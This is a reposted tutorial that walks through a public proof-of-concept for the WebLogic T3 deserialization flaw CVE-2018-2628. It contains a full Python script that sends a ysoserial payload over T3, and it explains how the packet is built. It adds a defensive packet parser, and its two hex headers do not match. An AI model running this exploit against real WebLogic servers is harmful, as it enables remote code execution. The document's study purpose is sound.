How to see T3 deserialization from CVE-2018-2628 POC

2025-03-29 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 05/31 Report

Many people with little experience do not know how to read a T3 deserialization exploit starting from the CVE-2018-2628 POC. This article therefore walks through the cause of the problem and how the POC is built, so that you can follow the same steps yourself.

0x00 The handshake between the POC and T3

First, here is a POC written by another researcher:

https://blog.csdn.net/he_and/article/details/97924679

```python
import binascii
import socket
import time


def T3():
    # T3 handshake: protocol version line, then AS/HL/MS/PU headers, ended by a blank line
    hello = 'T3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
    host = ('127.0.0.1', 7001)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(15)
    sock.connect(host)
    sock.send(hello.encode('utf-8'))
    time.sleep(1)
    resp1 = sock.recv(1024)   # the server's handshake reply
    print(resp1)
    # non-serialized T3 header bytes, as a hex string (reproduced as printed on the page)
    data1 = '016501ffffffffffffffffffff00006900ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3bd11bf136d67027973720078720178720270000000000000006007070707000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
    # the serialized payload file generated with ysoserial, converted to a hex string
    with open('poc', 'rb') as f:
        a = binascii.b2a_hex(f.read()).decode('utf-8')
    print(a)
    data = data1 + a
    # prefix the 4-byte packet length (payload bytes + 4) as 8 zero-padded hex digits
    data = '%s%s' % ('{:08x}'.format(len(data) // 2 + 4), data)
    sock.send(binascii.a2b_hex(data))
    time.sleep(2)
    sock.send(binascii.a2b_hex(data))


if __name__ == "__main__":
    T3()
```

The first step of this POC is to send a T3 handshake message to WebLogic. After receiving it, the server replies with its own handshake message.

So try the first step:

0x01 T3 data header extraction

Look at the construction of the second step:

When I decoded the hexadecimal string in data1, I found it was garbled, so I went and read another researcher's article:

https://d1iv3.me/2018/06/05/CVE-2015-4852-Weblogic-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96RCE%E5%88%86%E6%9E%90/

Then go to the target machine and modify /Oracle/Middleware/user_projects/domains/base_domain/bin/stopWebLogic.sh. When this script sends a stop request to another WebLogic host, it sends T3 serialized data, which can then be captured with Wireshark.

Follow the TCP stream between the two IP addresses and view it as hex:

Anyone familiar with the characteristics of deserialization traffic knows that each piece of Java serialized data begins with ac ed 00 05, so first find the position of the first serialized segment in the stream.

Here is an overview of the T3 data stream structure:

The stream above is made up of many segments of serialized data, which the WebLogic backend splits up and parses one by one.

So, following the guidance in those articles, there are two ways to construct the POC.

POC construction mode 1:

Replace any one of the serialized segments (those beginning with ac ed) with the malicious serialized data.

POC construction mode 2:

Directly concatenate the packet-length prefix and the first, non-serialized part of the packet with the malicious serialized data (that is, replace all of the serialized segments beginning with ac ed in a normal packet with a single piece of malicious serialized data).

To keep things simple, the second approach is used here.

So we first cut out the non-Java-serialized data of the first part, and end up with data organised like this:

0x02 T3 data structure

At this point, take a look back at the second half of the POC code:

```python
    data1 = '016501ffffffffffffffff0000006900ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3b7d14d11bf136d67097372007872017872087000000a00000000000000000000000070707070000000000000000000000000000000000000000000000700006000006fe010000'
    with open('poc', 'rb') as f:
        a = binascii.b2a_hex(f.read()).decode('utf-8')
    print(a)
    data = data1 + a
    data = '%s%s' % ('{:08x}'.format(len(data) // 2 + 4), data)
    sock.send(binascii.a2b_hex(data))
    time.sleep(2)
    sock.send(binascii.a2b_hex(data))


if __name__ == "__main__":
    T3()
```

Here ysoserial.jar is used directly to generate the poc file (a payload whose effect is to create a new file).

```python
a = binascii.b2a_hex(f.read()).decode('utf-8')
```

This converts the file contents into a hexadecimal string representation.

```python
data = '%s%s' % ('{:08x}'.format(len(data) // 2 + 4), data)
```

Here the byte length of the packet is computed: the hex string length divided by 2 gives the payload bytes, and 4 is added for the length field itself. The result is formatted as 8 hex digits, zero-padded on the left, and placed at the start of the packet.

This is also why the TXT sorted out above is not quite right: its first four bytes are the length field, and since we do not know in advance how many bytes the final packet will contain, that value has to be recalculated.

So the value where the arrow points needs to be recalculated.
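To make the packet layout described above concrete, here is an added example (not code from the original post) that parses a T3 handshake line, computes the 4-byte length prefix with the same rule as the POC, and locates every ac ed 00 05 segment in a packet; this is the check a defender would run over captured T3 traffic, and the sample packet is constructed, not captured.

```python
import struct

# Java serialization stream header: STREAM_MAGIC (0xACED) + STREAM_VERSION (5)
JAVA_STREAM_MAGIC = bytes.fromhex("aced0005")


def parse_t3_handshake(hello: bytes) -> dict:
    """Split a T3 hello ('t3 <version>\\nAS:..\\nHL:..\\nMS:..\\nPU:..\\n\\n') into fields."""
    lines = hello.decode("ascii", errors="replace").split("\n")
    proto, _, version = lines[0].partition(" ")
    fields = {"protocol": proto.lower(), "version": version}
    for line in lines[1:]:
        key, sep, value = line.partition(":")   # the PU value keeps its own colons
        if sep:
            fields[key] = value
    return fields


def t3_length_header(body: bytes) -> bytes:
    """4-byte big-endian length prefix = payload bytes + the 4 header bytes,
    the same rule as '{:08x}'.format(len(hexstr) // 2 + 4) in the POC."""
    return struct.pack(">I", len(body) + 4)


def inspect_t3_packet(packet: bytes) -> dict:
    """Verify the length prefix and list the offset of every ac ed 00 05 segment."""
    if len(packet) < 4:
        raise ValueError("shorter than the 4-byte T3 length header")
    declared = struct.unpack(">I", packet[:4])[0]
    offsets = []
    pos = packet.find(JAVA_STREAM_MAGIC)
    while pos != -1:
        offsets.append(pos)
        pos = packet.find(JAVA_STREAM_MAGIC, pos + len(JAVA_STREAM_MAGIC))
    return {"declared_len": declared, "actual_len": len(packet),
            "length_ok": declared == len(packet), "serialized_offsets": offsets}


# Constructed sample, not captured traffic: a filler T3 preamble followed by two
# Java serialized segments whose bodies are just filler bytes.
SAMPLE_BODY = (bytes.fromhex("016501") + b"\xff" * 8
               + JAVA_STREAM_MAGIC + b"\x77\x02\x00\x00"
               + b"\x00" * 3
               + JAVA_STREAM_MAGIC + b"\x77\x01\x00")
SAMPLE_PACKET = t3_length_header(SAMPLE_BODY) + SAMPLE_BODY

if __name__ == "__main__":
    print(parse_t3_handshake(b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"))
    print(inspect_t3_packet(SAMPLE_PACKET))
```

A packet whose declared length does not match its real size, or a T3 stream that suddenly carries a single serialized segment where a normal exchange carries many, is exactly the kind of anomaly a T3-aware filter can flag.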

Launch an attack on the target with the constructed POC code:

Check to see if a new file has been created:

At this point, the POC has finished the analysis.

After reading the above, have you understood how to read T3 deserialization from the CVE-2018-2628 POC? If you want to learn more, you are welcome to follow the industry information channel. Thank you for reading!
